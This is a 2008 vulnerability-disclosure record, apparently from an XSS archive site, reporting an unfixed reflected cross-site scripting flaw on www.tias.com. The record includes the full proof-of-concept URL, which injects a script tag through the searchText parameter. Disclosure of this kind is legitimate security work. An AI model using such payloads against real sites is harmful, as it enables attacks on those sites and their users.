Security researcher tenest, has submitted on 04/09/2008 a cross-site-scripting (XSS) vulnerability affecting www.tias.com, which at the time of submission ranked 21908 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 23/09/2008. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 04/09/2008 |
Date published: 23/09/2008 |
Fixed? Mail us! | Status: UNFIXED |
Author: tenest |
Domain: www.tias.com |
Category: XSS |
Pagerank: 21908 |
URL: http://www.tias.com/cgi-bin/search.fcgi?database=%2Faltavista%2Fstores%2Fitems&max=50&noResultPageTe mplate=NoResultPage2.html&resultPageTemplate=ResultPage2.html&resultItemTemplate=CatResultItem.txt&r esultTableTemplate=CatResultTable2.txt&itemResultPageTemplate=ResultPage.html&itemResultItemTemplate =ResultItem2.txt&itemResultTableTemplate=ResultTable.txt&itemDatabase=%2Faltavista%2Fstores%2Fitems& bothSearch=1&primaryServer=&minPrice=1&matchAll=1&searchText=foobar%22%3E%3Cscript%3Ealert(%27xssed% 27)%3C/script%3E&search=Find |
Click here to view the mirror
|
|
|